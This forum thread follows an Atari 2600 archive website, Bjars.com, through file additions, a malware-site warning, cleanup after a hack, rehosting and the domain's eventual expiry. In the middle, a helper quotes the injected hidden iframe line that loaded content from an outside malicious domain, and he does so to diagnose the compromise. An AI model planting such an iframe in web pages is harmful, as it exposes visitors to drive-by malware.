IGNORED

New Atari 2600 Archives Website - Bjars.com

I'd be happy to add anything that would make the site more useful and up to date.

You could add some more disassemblies like ET...

Will do, thanks for pointing that one out. :)

EDIT: Disassemblies page has been updated with ET.

Edited by Atarius Maximus

Hello!

My bjars.com website is still out there, it looks like people are using it as I've gotten thousands of visits since I first started it. If anyone has any more suggestions or additional tools, source code, or disassemblies they'd like to see added post 'em up here or send me a PM. I'd be happy to add anything that would make the site more useful and up to date.

Thanks,

Steve

PM sent!

Your file has been added to the Source Code page. Thanks!

No problem! Glad to help you out, your site is one of the best :)

• 7 months later...

Here are some more things you can add if you'd like:

* Colors.asm - disassembly of 'Colors PAL' prototype

* Pong256Bytes.asm - source code for my 256 byte pong clone

* RAMCombat.asm - source code for my RAM bassed combat clone

* RAMFrogPond.asm - source code for my RAM bassed Frog Pond clone

* Bankswitching - updated bankswitching demos

stuff for Bjars.zip

• 4 weeks later...

Here are some more things you can add if you'd like:

* Colors.asm - disassembly of 'Colors PAL' prototype

* Pong256Bytes.asm - source code for my 256 byte pong clone

* RAMCombat.asm - source code for my RAM bassed combat clone

* RAMFrogPond.asm - source code for my RAM bassed Frog Pond clone

* Bankswitching - updated bankswitching demos

Just noticed your post, I've updated the site with those files.

Thanks!

Steve

• 3 years later...

Huh?

I don't update my site very often (a few times a year) but I still get lots of downloads and hits every month, so I've been paying the $35 or so a year since 2006 to keep the site up. I visitied the site for the first time in months today on my new Windows 8 laptop, and I got a message from IE that bjars.com has been reported as unsafe. WTF? It's just a personal home page with Atari downloads. I clicked on "more information" on the warning page and reported the ridiculousness of the warning to Mircosoft, but I doubt anything will change. I just renewed bjars.com in October 2013 so it's good until Oct 2014, but if anyone wants all of the content I'd be happy to hand it over. If people searching for Atari related downloads see this bogus warning message no one is going to visit the site, which defeats the purpose of paying for it. Ugh. Very Frustrating.

post-2143-0-78374100-1387517027_thumb.jpg

Please don't let the site go down.

It's also Google who is reporting the same. According to Google the website distributes malware from the two domains donutszzz.biz/, elite-bijou.com.ua

Your website has been hacked. If you analyze the source code, you find:

<iframe src="http://elite-bijou.com.ua/wp-includes/13x.php" border="0" width="6" height="5" />
at the end of the body. This code must have been injected by someone else. While the link is dead, this only means that your website is safe at the moment. But if someone had access once he can have access anytime again and change the code to active malware. Probably donutszzz.biz was already replaced with elite-bijou.com.ua. So it is just a matter of time until this get changed again.

You should contact the webmaster of the server. And change your password! Finally you should take actions that your url is removed from the blacklists.

Edited by Thomas Jentzsch

Thank you for the advice, Thomas. I honestly never considered that the site had been hacked. Who would bother with that on a site like mine? Either way, I'll change the password, notify the web host, and take the necessary steps to remove my site from being blacklisted.

Who would bother with that on a site like mine?

Because people go there. Even if it's one 50 per day, and 2% of them have of vulnerable browser, 1 per day gets infected.

Also most of the site are not "exploited by hand", but with software that owns the site automatically, if there are any holes.

This line of code:

<iframe src="http://elite-bijou.com.ua/wp-includes/13x.php" border="0" width="6" height="5" />

had been placed on the bottom of every page of html on my site.

I cleaned up all of the code and updated the site, changed my passwords, and went through via the 'webmaster tools' security review process with google to have my site reviewed again and hopefully un-flagged as harmful. Google indicated that it would take 24 hours to complete the review. Thanks for pointing out that line of malicious code, Thomas, not sure I would have immediately caught that.

Steve

Because of the winter storm in the Midwest it was really slow at work today so I had plenty of time to work on some personal projects. I spent about 6-7 hours changing the bjars.com website. The content is basically the same, but I changed the layout & graphics to make it a bit easier to add new content, make it easier to navigate, and I think it also looks a bit nicer. There may still be a few kinks since I just updated it today. I should have some time tomorrow to review everything and make sure it all works properly.

• Like 3

• 6 months later...

Thank you so much to Albert for agreeing to host bjars.com at AtariAge. My website has been down often this year due to frequently exceeding the 1GB monthly bandwidth limitation on my free web host, and Al has graciously accepted my request to host the site. It's up and running now, but many links are broken and the forum is down indefinitely until an alternative is found (which Al has also offered help with). I'll be working on that in the coming weeks. Thanks to everyone for your support of my site over the years, and thanks to Al for being such a great supporter of the Atari community.

• Like 2

• 9 years later...
On 7/11/2014 at 5:51 AM, Atarius Maximus said:

Thank you so much to Albert for agreeing to host bjars.com at AtariAge. My website has been down often this year due to frequently exceeding the 1GB monthly bandwidth limitation on my free web host, and Al has graciously accepted my request to host the site. It's up and running now, but many links are broken and the forum is down indefinitely until an alternative is found (which Al has also offered help with). I'll be working on that in the coming weeks. Thanks to everyone for your support of my site over the years, and thanks to Al for being such a great supporter of the Atari community.

@Albert Is it still hosted by AA?

Hey Guys,

I simply decided to let it go.  I haven't updated it for years and decided I didn't want to maintain it anymore.  I have a full backup of the site that I could share (it's not very big) and as Thomas pointed out it will forever be accessible at the Wayback machine.

Steve

Here's an archive of the website.  It's a full backup taken in October 2023 and is the most current.  

bjars_site_archive.rar

A little suprised someone is offering it for $2895.  I didn't think about it being a valuable domain name, I just let it expire.

• Like 5